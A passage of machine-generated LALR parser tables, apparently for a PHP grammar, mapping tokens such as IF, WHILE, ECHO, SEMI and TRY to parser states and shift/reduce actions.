,658,740,741,759,762,774,776,777,811,813,820,825,841,844,849,853,862,867,869,870,877,878,882,890,893,909,910,915,917,918,930,935,946,951,954,963,966,968,973,974,977,],[-443,15,-3,-2,-4,-5,-6,-50,-47,-443,-48,-38,-40,-42,-8,-443,15,-30,-11,-12,-39,-41,-43,-44,-45,-46,-56,-443,-7,15,-9,-443,-443,661,-130,-10,-443,-33,-70,-37,-49,-443,-53,-57,-60,767,-443,781,-136,-111,-129,-443,-62,-51,-55,781,-110,-135,-31,-64,-34,-85,-109,-139,-132,-134,-65,-71,-36,-83,-86,-87,-61,-138,-141,-35,-76,-88,-54,-108,-133,-32,-140,-63,-84,-77,-131,-157,-52,-137,-156,]),'LBRACE':([0,2,3,4,5,6,7,10,11,12,13,17,19,29,31,35,39,43,44,67,73,74,75,77,78,79,80,82,83,84,85,88,89,90,91,92,93,94,95,96,97,100,101,104,105,106,107,109,111,113,114,116,117,120,121,130,131,164,165,166,167,168,169,173,178,180,181,187,188,189,190,203,204,206,207,208,209,212,213,214,216,223,224,225,226,227,228,234,235,236,237,238,239,240,241,242,243,247,248,249,250,252,253,256,259,260,261,269,271,273,275,276,277,278,279,283,285,286,287,288,289,292,295,299,300,301,302,303,305,306,309,310,311,312,313,314,315,316,317,318,319,320,321,322,323,324,325,326,327,328,329,330,331,332,333,334,335,337,342,343,344,345,346,347,348,352,355,360,361,367,368,370,372,374,376,377,378,379,380,381,382,383,384,385,386,388,390,391,392,394,395,402,410,411,414,415,416,417,418,419,426,427,428,430,431,433,434,437,439,440,441,442,443,445,449,450,472,473,477,478,480,481,482,483,484,486,487,492,494,497,500,501,511,512,514,515,516,520,521,524,525,527,529,530,531,536,538,539,544,546,547,548,549,552,553,558,561,562,563,564,565,566,570,613,614,618,619,620,621,622,623,625,630,634,636,637,638,639,640,644,651,652,657,673,674,675,676,677,685,686,695,698,701,702,703,740,741,742,743,745,746,759,761,762,763,765,766,768,775,776,783,787,789,790,791,792,794,795,797,798,800,801,802,804,805,811,813,814,817,818,820,822,825,832,835,836,841,846,854,856,862,867,868,869,870,871,873,874,875,876,877,878,881,882,883,884,900,902,903,905,908,909,910,911,912,913,914,915,917,918,919,920,934,935,936,937,938,940,941,951,954,955,958,962,963,964,965,967,972,973,975,],[-443,13,-3,-2,-4,-5,-6,-50,114,-362,-443,132,13,-47,180,-429,-180,-251,-430,-344,-206,-350,-351,-354,-355,-356,-361,-342,-343,-207,-208,-367,-368,-369,-371,-372,-373,-374,-375,-376,-377,-225,-226,268,270,-237,-239,132,-190,276,-443,-429,-430,13,-23,-48,304,-38,132,-40,132,-42,132,351,132,-443,132,-370,-443,-443,373,-323,-324,-443,-185,-186,-187,-192,-225,268,-198,132,-315,-316,-317,-318,-321,268,-322,-325,-326,-327,-328,-329,-330,-331,132,-338,-339,-340,-341,-347,-348,304,-363,429,432,-227,268,-349,-8,-443,13,-364,-428,132,-30,-22,-24,-25,-26,-11,-12,132,-443,-443,-244,-248,-250,132,-289,-290,-291,-292,-293,-294,-295,-296,-297,-298,-299,-300,-301,-302,-303,-304,-305,-306,-307,-308,-309,-310,-311,-312,-313,-314,132,132,132,132,132,-39,-41,-43,-44,-45,-46,13,-56,-443,-115,519,-151,-181,-278,-279,-280,-281,-282,-283,-284,-285,-286,-287,-288,-183,-197,528,-188,304,532,-253,429,432,132,132,-345,132,-443,-352,-365,-385,-229,-366,-230,-357,-358,-219,132,132,-7,13,-9,-209,-28,132,268,270,13,-184,-221,617,-245,132,-238,-320,13,631,132,132,-443,13,-353,650,-121,-116,-117,-150,-149,-182,-234,-229,-189,-443,-230,-252,132,132,-333,-336,-337,-346,-443,132,-361,132,132,-218,-235,-236,-240,-10,-29,-443,-443,-249,-319,-33,-70,-443,132,132,-37,-49,-443,-53,-57,-60,-443,-443,-120,-118,-111,-196,132,-191,-194,132,-205,-223,-210,-231,-232,-211,-27,-443,-62,13,-220,132,13,-51,832,-55,13,835,836,-273,-119,-110,-148,852,-231,304,-193,-232,-199,132,304,-222,132,-212,-213,-214,-215,-31,-64,13,-246,-247,-34,13,-85,-443,-443,-443,-109,892,-195,-443,-65,-71,13,-36,-83,-443,132,-443,-92,-93,-86,-87,13,-61,13,13,-224,-216,-217,132,-443,-35,-76,-443,13,-443,13,-88,-54,-108,-271,-272,13,-32,132,13,13,13,955,-63,-84,-443,967,-443,-77,13,967,-443,13,-52,13,]),'IF':([0,2,3,4,5,6,7,10,13,19,29,114,120,121,130,164,166,168,180,275,276,277,285,286,287,288,289,292,295,345,346,347,348,352,355,360,361,441,442,443,449,477,487,500,501,566,570,613,614,620,621,622,630,634,636,637,638,639,640,657,703,740,741,742,746,759,762,763,776,811,813,814,820,822,825,832,835,836,841,862,867,868,869,870,871,874,875,876,877,878,881,882,883,884,908,909,910,911,912,913,914,915,917,918,934,935,937,938,940,951,954,955,962,963,964,967,972,973,975,],[-443,16,-3,-2,-4,-5,-6,-50,-443,16,-47,-443,16,-23,-48,-38,-40,-42,-443,-8,-443,16,-30,-22,-24,-25,-26,-11,-12,-39,-41,-43,-44,-45,-46,16,-56,-7,16,-9,-28,16,16,-443,16,-10,-29,-443,-443,-33,-70,-443,-37,-49,-443,-53,-57,-60,-443,-111,-27,-443,-62,16,16,-51,-55,16,-110,-31,-64,16,-34,16,-85,-443,-443,-443,-109,-65,-71,16,-36,-83,-443,-443,-92,-93,-86,-87,16,-61,16,16,-443,-35,-76,-443,16,-443,16,-88,-54,-108,16,-32,16,16,16,-63,-84,-443,-443,-77,16,-443,16,-52,16,]),'WHILE':([0,2,3,4,5,6,7,10,13,19,29,114,120,121,130,160,164,166,168,180,275,276,277,285,286,287,288,289,292,295,345,346,347,348,352,355,360,361,441,442,443,449,477,487,500,501,566,570,613,614,620,621,622,630,634,636,637,638,639,640,657,703,740,741,742,746,759,762,763,776,811,813,814,820,822,825,832,835,836,841,862,867,868,869,870,871,874,875,876,877,878,881,882,883,884,908,909,910,911,912,913,914,915,917,918,934,935,937,938,940,951,954,955,962,963,964,967,972,973,975,],[-443,18,-3,-2,-4,-5,-6,-50,-443,18,-47,-443,18,-23,-48,338,-38,-40,-42,-443,-8,-443,18,-30,-22,-24,-25,-26,-11,-12,-39,-41,-43,-44,-45,-46,18,-56,-7,18,-9,-28,18,18,-443,18,-10,-29,-443,-443,-33,-70,-443,-37,-49,-443,-53,-57,-60,-443,-111,-27,-443,-62,18,18,-51,-55,18,-110,-31,-64,18,-34,18,-85,-443,-443,-443,-109,-65,-71,18,-36,-83,-443,-443,-92,-93,-86,-87,18,-61,18,18,-443,-35,-76,-443,18,-443,18,-88,-54,-108,18,-32,18,18,18,-63,-84,-443,-443,-77,18,-443,18,-52,18,]),'DO':([0,2,3,4,5,6,7,10,13,19,29,114,120,121,130,164,166,168,180,275,276,277,285,286,287,288,289,292,295,345,346,347,348,352,355,360,361,441,442,443,449,477,487,500,501,566,570,613,614,620,621,622,630,634,636,637,638,639,640,657,703,740,741,742,746,759,762,763,776,811,813,814,820,822,825,832,835,836,841,862,867,868,869,870,871,874,875,876,877,878,881,882,883,884,908,909,910,911,912,913,914,915,917,918,934,935,937,938,940,951,954,955,962,963,964,967,972,973,975,],[-443,19,-3,-2,-4,-5,-6,-50,-443,19,-47,-443,19,-23,-48,-38,-40,-42,-443,-8,-443,19,-30,-22,-24,-25,-26,-11,-12,-39,-41,-43,-44,-45,-46,19,-56,-7,19,-9,-28,19,19,-443,19,-10,-29,-443,-443,-33,-70,-443,-37,-49,-443,-53,-57,-60,-443,-111,-27,-443,-62,19,19,-51,-55,19,-110,-31,-64,19,-34,19,-85,-443,-443,-443,-109,-65,-71,19,-36,-83,-443,-443,-92,-93,-86,-87,19,-61,19,19,-443,-35,-76,-443,19,-443,19,-88,-54,-108,19,-32,19,19,19,-63,-84,-443,-443,-77,19,-443,19,-52,19,]),'FOR':([0,2,3,4,5,6,7,10,13,19,29,114,120,121,130,164,166,168,180,275,276,277,285,286,287,288,289,292,295,345,346,347,348,352,355,360,361,441,442,443,449,477,487,500,501,566,570,613,614,620,621,622,630,634,636,637,638,639,640,657,703,740,741,742,746,759,762,763,776,811,813,814,820,822,825,832,835,836,841,862,867,868,869,870,871,874,875,876,877,878,881,882,883,884,908,909,910,911,912,913,914,915,917,918,934,935,937,938,940,951,954,955,962,963,964,967,972,973,975,],[-443,20,-3,-2,-4,-5,-6,-50,-443,20,-47,-443,20,-23,-48,-38,-40,-42,-443,-8,-443,20,-30,-22,-24,-25,-26,-11,-12,-39,-41,-43,-44,-45,-46,20,-56,-7,20,-9,-28,20,20,-443,20,-10,-29,-443,-443,-33,-70,-443,-37,-49,-443,-53,-57,-60,-443,-111,-27,-443,-62,20,20,-51,-55,20,-110,-31,-64,20,-34,20,-85,-443,-443,-443,-109,-65,-71,20,-36,-83,-443,-443,-92,-93,-86,-87,20,-61,20,20,-443,-35,-76,-443,20,-443,20,-88,-54,-108,20,-32,20,20,20,-63,-84,-443,-443,-77,20,-443,20,-52,20,]),'FOREACH':([0,2,3,4,5,6,7,10,13,19,29,114,120,121,130,164,166,168,180,275,276,277,285,286,287,288,289,292,295,345,346,347,348,352,355,360,361,441,442,443,449,477,487,500,501,566,570,613,614,620,621,622,630,634,636,637,638,639,640,657,703,740,741,742,746,759,762,763,776,811,813,814,820,822,825,832,835,836,841,862,867,868,869,870,871,874,875,876,877,878,881,882,883,884,908,909,910,911,912,913,914,915,917,918,934,935,937,938,940,951,954,955,962,963,964,967,972,973,975,],[-443,21,-3,-2,-4,-5,-6,-50,-443,21,-47,-443,21,-23,-48,-38,-40,-42,-443,-8,-443,21,-30,-22,-24,-25,-26,-11,-12,-39,-41,-43,-44,-45,-46,21,-56,-7,21,-9,-28,21,21,-443,21,-10,-29,-443,-443,-33,-70,-443,-37,-49,-443,-53,-57,-60,-443,-111,-27,-443,-62,21,21,-51,-55,21,-110,-31,-64,21,-34,21,-85,-443,-443,-443,-109,-65,-71,21,-36,-83,-443,-443,-92,-93,-86,-87,21,-61,21,21,-443,-35,-76,-443,21,-443,21,-88,-54,-108,21,-32,21,21,21,-63,-84,-443,-443,-77,21,-443,21,-52,21,]),'SWITCH':([0,2,3,4,5,6,7,10,13,19,29,114,120,121,130,164,166,168,180,275,276,277,285,286,287,288,289,292,295,345,346,347,348,352,355,360,361,441,442,443,449,477,487,500,501,566,570,613,614,620,621,622,630,634,636,637,638,639,640,657,703,740,741,742,746,759,762,763,776,811,813,814,820,822,825,832,835,836,841,862,867,868,869,870,871,874,875,876,877,878,881,882,883,884,908,909,910,911,912,913,914,915,917,918,934,935,937,938,940,951,954,955,962,963,964,967,972,973,975,],[-443,22,-3,-2,-4,-5,-6,-50,-443,22,-47,-443,22,-23,-48,-38,-40,-42,-443,-8,-443,22,-30,-22,-24,-25,-26,-11,-12,-39,-41,-43,-44,-45,-46,22,-56,-7,22,-9,-28,22,22,-443,22,-10,-29,-443,-443,-33,-70,-443,-37,-49,-443,-53,-57,-60,-443,-111,-27,-443,-62,22,22,-51,-55,22,-110,-31,-64,22,-34,22,-85,-443,-443,-443,-109,-65,-71,22,-36,-83,-443,-443,-92,-93,-86,-87,22,-61,22,22,-443,-35,-76,-443,22,-443,22,-88,-54,-108,22,-32,22,22,22,-63,-84,-443,-443,-77,22,-443,22,-52,22,]),'BREAK':([0,2,3,4,5,6,7,10,13,19,29,114,120,121,130,164,166,168,180,275,276,277,285,286,287,288,289,292,295,345,346,347,348,352,355,360,361,441,442,443,449,477,487,500,501,566,570,613,614,620,621,622,630,634,636,637,638,639,640,657,703,740,741,742,746,759,762,763,776,811,813,814,820,822,825,832,835,836,841,862,867,868,869,870,871,874,875,876,877,878,881,882,883,884,908,909,910,911,912,913,914,915,917,918,934,935,937,938,940,951,954,955,962,963,964,967,972,973,975,],[-443,23,-3,-2,-4,-5,-6,-50,-443,23,-47,-443,23,-23,-48,-38,-40,-42,-443,-8,-443,23,-30,-22,-24,-25,-26,-11,-12,-39,-41,-43,-44,-45,-46,23,-56,-7,23,-9,-28,23,23,-443,23,-10,-29,-443,-443,-33,-70,-443,-37,-49,-443,-53,-57,-60,-443,-111,-27,-443,-62,23,23,-51,-55,23,-110,-31,-64,23,-34,23,-85,-443,-443,-443,-109,-65,-71,23,-36,-83,-443,-443,-92,-93,-86,-87,23,-61,23,23,-443,-35,-76,-443,23,-443,23,-88,-54,-108,23,-32,23,23,23,-63,-84,-443,-443,-77,23,-443,23,-52,23,]),'CONTINUE':([0,2,3,4,5,6,7,10,13,19,29,114,120,121,130,164,166,168,180,275,276,277,285,286,287,288,289,292,295,345,346,347,348,352,355,360,361,441,442,443,449,477,487,500,501,566,570,613,614,620,621,622,630,634,636,637,638,639,640,657,703,740,741,742,746,759,762,763,776,811,813,814,820,822,825,832,835,836,841,862,867,868,869,870,871,874,875,876,877,878,881,882,883,884,908,909,910,911,912,913,914,915,917,918,934,935,937,938,940,951,954,955,962,963,964,967,972,973,975,],[-443,24,-3,-2,-4,-5,-6,-50,-443,24,-47,-443,24,-23,-48,-38,-40,-42,-443,-8,-443,24,-30,-22,-24,-25,-26,-11,-12,-39,-41,-43,-44,-45,-46,24,-56,-7,24,-9,-28,24,24,-443,24,-10,-29,-443,-443,-33,-70,-443,-37,-49,-443,-53,-57,-60,-443,-111,-27,-443,-62,24,24,-51,-55,24,-110,-31,-64,24,-34,24,-85,-443,-443,-443,-109,-65,-71,24,-36,-83,-443,-443,-92,-93,-86,-87,24,-61,24,24,-443,-35,-76,-443,24,-443,24,-88,-54,-108,24,-32,24,24,24,-63,-84,-443,-443,-77,24,-443,24,-52,24,]),'RETURN':([0,2,3,4,5,6,7,10,13,19,29,114,120,121,130,164,166,168,180,275,276,277,285,286,287,288,289,292,295,345,346,347,348,352,355,360,361,441,442,443,449,477,487,500,501,566,570,613,614,620,621,622,630,634,636,637,638,639,640,657,703,740,741,742,746,759,762,763,776,811,813,814,820,822,825,832,835,836,841,862,867,868,869,870,871,874,875,876,877,878,881,882,883,884,908,909,910,911,912,913,914,915,917,918,934,935,937,938,940,951,954,955,962,963,964,967,972,973,975,],[-443,25,-3,-2,-4,-5,-6,-50,-443,25,-47,-443,25,-23,-48,-38,-40,-42,-443,-8,-443,25,-30,-22,-24,-25,-26,-11,-12,-39,-41,-43,-44,-45,-46,25,-56,-7,25,-9,-28,25,25,-443,25,-10,-29,-443,-443,-33,-70,-443,-37,-49,-443,-53,-57,-60,-443,-111,-27,-443,-62,25,25,-51,-55,25,-110,-31,-64,25,-34,25,-85,-443,-443,-443,-109,-65,-71,25,-36,-83,-443,-443,-92,-93,-86,-87,25,-61,25,25,-443,-35,-76,-443,25,-443,25,-88,-54,-108,25,-32,25,25,25,-63,-84,-443,-443,-77,25,-443,25,-52,25,]),'GLOBAL':([0,2,3,4,5,6,7,10,13,19,29,114,120,121,130,164,166,168,180,275,276,277,285,286,287,288,289,292,295,345,346,347,348,352,355,360,361,441,442,443,449,477,487,500,501,566,570,613,614,620,621,622,630,634,636,637,638,639,640,657,703,740,741,742,746,759,762,763,776,811,813,814,820,822,825,832,835,836,841,862,867,868,869,870,871,874,875,876,877,878,881,882,883,884,908,909,910,911,912,913,914,915,917,918,934,935,937,938,940,951,954,955,962,963,964,967,972,973,975,],[-443,26,-3,-2,-4,-5,-6,-50,-443,26,-47,-443,26,-23,-48,-38,-40,-42,-443,-8,-443,26,-30,-22,-24,-25,-26,-11,-12,-39,-41,-43,-44,-45,-46,26,-56,-7,26,-9,-28,26,26,-443,26,-10,-29,-443,-443,-33,-70,-443,-37,-49,-443,-53,-57,-60,-443,-111,-27,-443,-62,26,26,-51,-55,26,-110,-31,-64,26,-34,26,-85,-443,-443,-443,-109,-65,-71,26,-36,-83,-443,-443,-92,-93,-86,-87,26,-61,26,26,-443,-35,-76,-443,26,-443,26,-88,-54,-108,26,-32,26,26,26,-63,-84,-443,-443,-77,26,-443,26,-52,26,]),'STATIC':([0,2,3,4,5,6,7,9,10,13,19,23,24,25,28,29,32,40,41,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,63,64,65,66,68,69,114,119,120,121,129,130,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,161,162,163,164,166,168,173,179,180,191,192,193,194,195,196,197,198,199,200,201,202,205,217,218,222,244,245,246,251,265,267,268,270,275,276,277,284,285,286,287,288,289,291,292,294,295,304,336,345,346,347,348,351,352,354,355,356,360,361,365,373,375,389,404,407,423,424,425,429,432,441,442,443,444,446,449,455,456,457,468,477,479,485,487,488,489,490,491,499,500,501,503,504,519,522,523,528,532,533,535,537,540,545,556,557,559,560,566,570,571,572,573,574,575,576,577,578,579,580,581,582,583,584,585,586,587,588,589,590,591,592,593,594,602,613,614,616,617,620,621,622,629,630,634,636,637,638,639,640,645,646,650,654,655,657,658,662,665,666,667,668,669,670,671,672,679,682,693,703,734,735,740,741,742,746,748,751,752,759,762,763,764,771,773,774,776,777,788,796,803,806,811,813,814,820,822,825,826,832,835,836,839,841,844,849,851,853,860,861,862,867,868,869,870,871,874,875,876,877,878,881,882,883,884,890,893,894,907,908,909,910,911,912,913,914,915,917,918,924,927,928,930,934,935,937,938,940,944,946,951,954,955,962,963,964,966,967,968,972,973,974,975,977,],[-443,27,-3,-2,-4,-5,-6,111,-50,-443,27,111,111,111,111,-47,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,-443,111,27,-23,111,-48,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,334,111,111,111,111,111,-38,-40,-42,111,111,-443,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,-8,-443,27,111,-30,-22,-24,-25,-26,111,-11,111,-12,111,111,-39,-41,-43,-44,111,-45,111,-46,111,27,-56,111,-443,111,111,111,111,111,111,111,111,111,-7,27,-9,111,111,-28,111,111,111,111,27,111,111,27,111,111,111,111,111,-443,27,111,111,-443,667,-130,111,111,111,111,111,111,111,111,111,111,111,-10,-29,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,111,-443,-443,111,111,-33,-70,-443,111,-37,-49,-443,-53,-57,-60,-443,111,111,-443,667,-136,-111,-129,667,-159,-163,-164,-165,-166,-160,-161,-162,111,111,111,-27,111,111,-443,-62,27,27,111,111,111,-51,-55,27,111,111,111,667,-110,-135,-158,111,111,111,-31,-64,27,-34,27,-85,111,-443,-443,-443,111,-109,-139,-132,111,-134,111,111,-65,-71,27,-36,-83,-443,-443,-92,-93,-86,-87,27,-61,27,27,-138,-141,111,111,-443,-35,-76,-443,27,-443,27,-88,-54,-108,111,111,111,-133,27,-32,27,27,27,111,-140,-63,-84,-443,-443,-77,27,-131,-443,-157,27,-52,-137,27,-156,]),'ECHO':([0,2,3,4,5,6,7,10,13,19,29,114,120,121,130,164,166,168,180,275,276,277,285,286,287,288,289,292,295,345,346,347,348,352,355,360,361,441,442,443,449,477,487,500,501,566,570,613,614,620,621,622,630,634,636,637,638,639,640,657,703,740,741,742,746,759,762,763,776,811,813,814,820,822,825,832,835,836,841,862,867,868,869,870,871,874,875,876,877,878,881,882,883,884,908,909,910,911,912,913,914,915,917,918,934,935,937,938,940,951,954,955,962,963,964,967,972,973,975,],[-443,28,-3,-2,-4,-5,-6,-50,-443,28,-47,-443,28,-23,-48,-38,-40,-42,-443,-8,-443,28,-30,-22,-24,-25,-26,-11,-12,-39,-41,-43,-44,-45,-46,28,-56,-7,28,-9,-28,28,28,-443,28,-10,-29,-443,-443,-33,-70,-443,-37,-49,-443,-53,-57,-60,-443,-111,-27,-443,-62,28,28,-51,-55,28,-110,-31,-64,28,-34,28,-85,-443,-443,-443,-109,-65,-71,28,-36,-83,-443,-443,-92,-93,-86,-87,28,-61,28,28,-443,-35,-76,-443,28,-443,28,-88,-54,-108,28,-32,28,28,28,-63,-84,-443,-443,-77,28,-443,28,-52,28,]),'INLINE_HTML':([0,2,3,4,5,6,7,10,13,19,29,114,120,121,130,164,166,168,180,275,276,277,285,286,287,288,289,292,295,345,346,347,348,352,355,360,361,441,442,443,449,477,487,500,501,566,570,613,614,620,621,622,630,634,636,637,638,639,640,657,703,740,741,742,746,759,762,763,776,811,813,814,820,822,825,832,835,836,841,862,867,868,869,870,871,874,875,876,877,878,881,882,883,884,908,909,910,911,912,913,914,915,917,918,934,935,937,938,940,951,954,955,962,963,964,967,972,973,975,],[-443,29,-3,-2,-4,-5,-6,-50,-443,29,-47,-443,29,-23,-48,-38,-40,-42,-443,-8,-443,29,-30,-22,-24,-25,-26,-11,-12,-39,-41,-43,-44,-45,-46,29,-56,-7,29,-9,-28,29,29,-443,29,-10,-29,-443,-443,-33,-70,-443,-37,-49,-443,-53,-57,-60,-443,-111,-27,-443,-62,29,29,-51,-55,29,-110,-31,-64,29,-34,29,-85,-443,-443,-443,-109,-65,-71,29,-36,-83,-443,-443,-92,-93,-86,-87,29,-61,29,29,-443,-35,-76,-443,29,-443,29,-88,-54,-108,29,-32,29,29,29,-63,-84,-443,-443,-77,29,-443,29,-52,29,]),'UNSET':([0,2,3,4,5,6,7,10,13,19,29,114,120,121,130,164,166,168,180,275,276,277,285,286,287,288,289,292,295,345,346,347,348,352,355,360,361,441,442,443,449,477,487,500,501,566,570,613,614,620,621,622,630,634,636,637,638,639,640,657,703,740,741,742,746,759,762,763,776,811,813,814,820,822,825,832,835,836,841,862,867,868,869,870,871,874,875,876,877,878,881,882,883,884,908,909,910,911,912,913,914,915,917,918,934,935,937,938,940,951,954,955,962,963,964,967,972,973,975,],[-443,30,-3,-2,-4,-5,-6,-50,-443,30,-47,-443,30,-23,-48,-38,-40,-42,-443,-8,-443,30,-30,-22,-24,-25,-26,-11,-12,-39,-41,-43,-44,-45,-46,30,-56,-7,30,-9,-28,30,30,-443,30,-10,-29,-443,-443,-33,-70,-443,-37,-49,-443,-53,-57,-60,-443,-111,-27,-443,-62,30,30,-51,-55,30,-110,-31,-64,30,-34,30,-85,-443,-443,-443,-109,-65,-71,30,-36,-83,-443,-443,-92,-93,-86,-87,30,-61,30,30,-443,-35,-76,-443,30,-443,30,-88,-54,-108,30,-32,30,30,30,-63,-84,-443,-443,-77,30,-443,30,-52,30,]),'SEMI':([0,2,3,4,5,6,7,10,12,13,17,19,23,24,25,29,35,39,43,44,67,73,74,75,77,78,79,80,82,83,84,85,88,89,90,91,92,93,94,95,96,97,100,101,104,106,107,111,113,114,116,117,120,121,122,123,125,126,127,130,161,164,165,166,167,168,169,170,171,172,174,175,176,177,178,180,181,187,203,204,206,207,208,209,212,213,214,216,224,225,226,227,228,234,235,236,237,238,239,240,241,242,243,247,248,249,250,252,253,259,269,271,272,273,275,276,277,278,279,285,286,287,288,289,291,292,295,298,300,301,302,303,305,309,310,311,312,313,314,315,316,317,318,319,320,321,322,323,324,325,326,327,328,329,330,331,332,333,334,339,340,341,342,345,346,347,348,350,352,355,360,361,374,376,377,378,379,380,381,382,383,384,385,386,388,390,392,402,416,418,419,426,427,428,430,431,433,434,437,441,442,443,445,449,450,451,452,453,454,458,459,461,462,463,464,467,474,475,477,478,480,481,482,484,486,487,489,493,495,496,497,498,500,501,511,516,524,525,527,529,530,531,536,544,546,547,548,549,562,563,564,565,566,569,570,595,596,598,600,612,613,614,618,619,620,621,622,624,625,630,631,632,633,634,636,637,638,639,640,652,657,670,671,672,673,675,676,685,686,695,698,701,702,703,704,705,706,707,708,709,710,711,712,713,714,715,716,717,718,719,720,721,722,723,724,725,726,727,728,729,730,732,736,737,738,740,741,742,743,746,747,759,762,763,775,776,780,785,786,787,789,791,792,794,798,801,802,804,805,807,811,813,814,817,818,819,820,822,825,827,829,832,833,835,836,841,843,846,854,856,862,867,868,869,870,871,873,874,875,876,877,878,879,881,882,883,884,896,897,900,902,903,906,908,909,910,911,912,913,914,915,917,918,919,926,934,935,937,938,939,940,945,948,951,953,954,955,958,960,961,962,963,964,965,967,970,972,973,975,],[-443,10,-3,-2,-4,-5,-6,-50,-362,-443,130,10,164,166,168,-47,-429,-180,-251,-430,-344,-206,-350,-351,-354,-355,-356,-361,-342,-343,-207,-208,-367,-368,-369,-371,-372,-373,-374,-375,-376,-377,-225,-226,-228,-237,-239,-190,275,-443,-429,-430,10,-23,292,-20,295,-14,-15,-48,-443,-38,345,-40,346,-42,347,348,-95,-96,352,-100,-102,355,-104,-443,361,-370,-323,-324,-443,-185,-186,-187,-192,-225,-228,-198,-315,-316,-317,-318,-321,-228,-322,-325,-326,-327,-328,-329,-330,-331,-332,-338,-339,-340,-341,-347,-348,-363,-227,-228,441,-349,-8,-443,10,-364,-428,-30,-22,-24,-25,-26,449,-11,-12,-16,-443,-443,-244,-248,-250,-289,-290,-291,-292,-293,-294,-295,-296,-297,-298,-299,-300,-301,-302,-303,-304,-305,-306,-307,-308,-309,-310,-311,-312,-313,-314,489,-72,-73,-75,-39,-41,-43,-44,-97,-45,-46,10,-56,-181,-278,-279,-280,-281,-282,-283,-284,-285,-286,-287,-288,-183,-197,-188,-253,-345,-443,-352,-365,-385,-229,-366,-230,-357,-358,-219,-7,10,-9,-209,-28,570,-19,-429,-21,-402,-378,-379,-382,-383,-384,-389,-430,-13,-17,10,-184,-221,-243,-245,-238,-320,10,-443,-94,-99,-101,-103,634,-443,10,-353,-117,-182,-234,-229,-189,-443,-230,-252,-333,-336,-337,-346,-443,-218,-235,-236,-240,-10,703,-29,-392,-393,-380,-390,-18,-443,-443,-249,-319,-33,-70,-443,748,-74,-37,755,758,-98,-49,-443,-53,-57,-60,-443,-118,-111,-160,-161,-162,-196,-191,-194,-205,-223,-210,-231,-232,-211,-27,-403,-404,-405,-406,-407,-408,-409,-410,-411,-412,-413,-414,-415,-416,-417,-418,-419,-420,-421,-422,-423,-424,-425,-426,-427,-381,-391,-395,-365,-366,-386,-443,-62,10,-220,10,820,-51,-55,10,-119,-110,844,849,-145,853,-231,-193,-232,-199,-222,-212,-213,-214,-215,-394,-31,-64,10,-246,-247,867,-34,10,-85,876,878,-443,882,-443,-443,-109,890,893,-195,-443,-65,-71,10,-36,-83,-443,876,-443,-92,-93,-86,-87,915,10,-61,10,10,-144,-143,-224,-216,-217,935,-443,-35,-76,-443,10,-443,10,-88,-54,-108,-271,-147,10,-32,10,10,954,10,-146,-142,-63,963,-84,-443,968,969,971,-443,-77,10,968,-443,976,10,-52,10,]),'TRY':([0,2,3,4,5,6,7,10,13,19,29,114,120,121,130,164,166,168,180,275,276,277,285,286,287,288,289,292,295,345,346,347,348,352,355,360,361,441,442,443,449,477,487,500,501,566,570,613,614,620,621,622,630,634,636,637,638,639,640,657,703,740,741,742,746,759,762,763,776,811,813,814,820,822,825,832,835,836,841,862,867,868,869,870,871,874,875,876,877,878,881,882,883,884,908,909,910,911,912,913,914,915,917,918,934,935,937,938,940,951,954,955,962,963,964,967,972,973,975,],[-443,31,-3,-2,-4,-5,-6,-50,-443,31,-47,-443,31,-23,-48,-38,-40,-42,-443,-8,-443,31,-30,-22,-24,-25,-26,-11,-12,-39,-41,-43,-44,-45,-46,31,-56,-7,31,-9,-28,31,31,-443,31,-10,-29,-443,-443,-33,-70,-443,-37,-49,-443,-53,-57,-60,-443,-111,-27,-443,-62,31,31,-51,-55,31,-110,-31,-64,31,-34,31,-85,-443,-443,-443,-109,-65,-71,31,-36,-83,-443,-443,-92,-93,-86,-87,31,-61,31,31,-443,-35,-76,-443,31,-443,31,-88,-54,-108,31,-32,31,31,31,-63,-84,-443,-443,-77,31,-443,31,-52,31,]),'THROW':([0,2,3,4,5,6,7,10,13,19,29,114,120,121,130,164,166,168,180,275,276,277,285,286,287,288,289,292,295,345,346,347,348,352,355,360,361,441,442,443,449,477,487,500,501,566,570,613,614,620,621,622,630,634,636,637,638,639,640,657,703,740,741,742,746,759,762,763,776,811,813,814,820,822,825,832,835,836,841,862,867,868,869,870,871,874,875,876,877,878,881,882,883,884,908,909,910,911,912,913,914,915,917,918,934,935,937,938,940,951,954,955,962,963,964,967,972,973,975,],[-443,32,-3,-2,-4,-5,-6,-50,-443,32,-47,-443,32,-23,-48,-38,-40,-42,-443,-8,-443,32,-30,-22,-24,-25,-26,-11,-12,-39,-41,-43,-44,-45,-46,32,-56,-7,32,-9,-28,32,32,-443,32,-10,-29,-443,-443,-33,-70,-443,-37,-49,-443,-53,-57,-60,-443,-111,-27,-443,-62,32,32,-51,-55,32,-110,-31,-64,32,-34,32,-85,-443,-443,-443,-109,-65,-71,32,-36,-83,-443,-443,-92,-93,-86,-87,32,-61,32,32,-443,-35,-76,-443,32,-443,32,-88,-54,-108,32,-32,32,32,32,-63,-84,-443,-443,-77,32,-443,32,-52,32,]),'DECLARE':([0,2,3,4,5,6,7,10,13,19,29,114,120,121,130,164,166,168,180,275,276,277,285,286,287,288,289,292,295,345,346,347,348,352,355,360,361,441,442,443,449,477,487,500,501,566,570,613,614,620,621,622,630,634,636,637,638,639,640,657,703,740,741,742,746,759,762,763,776,811,813,814,820,822,825,832,835,836,841,862,867,868,869,870,871,874,875,876,877,878,881,882,883,884,908,909,910,911,912,913,914,915,917,918,934,935,937,938,940,951,954,955,962,963,964,967,972,973,975,],[-443,33,-3,-2,-4,-5,-6,-50,-443,33,-47,-443,33,-23,-48,-38,-40,-42,-443,-8,-443,33,-30,-22,-24,-25,-26,-11,-12,-39,-41,-43,-44,-45,-46,33,-56,-7,33,-9,-28,33,33,-443,33,-10,-29,-443,-443,-33,-70,-443,-37,-49,-443,-53,-57,-60,-443,-111,-27,-443,-62,33,33,-51,-55,33,-110,-31,-64,33,-34,33,-85,-443,-443,-443,-109,-65,-71,33,-36,-83,-443,-443,-92,-93,-86,-87,33,-61,33,33,-443,-35,-76,-443,33,-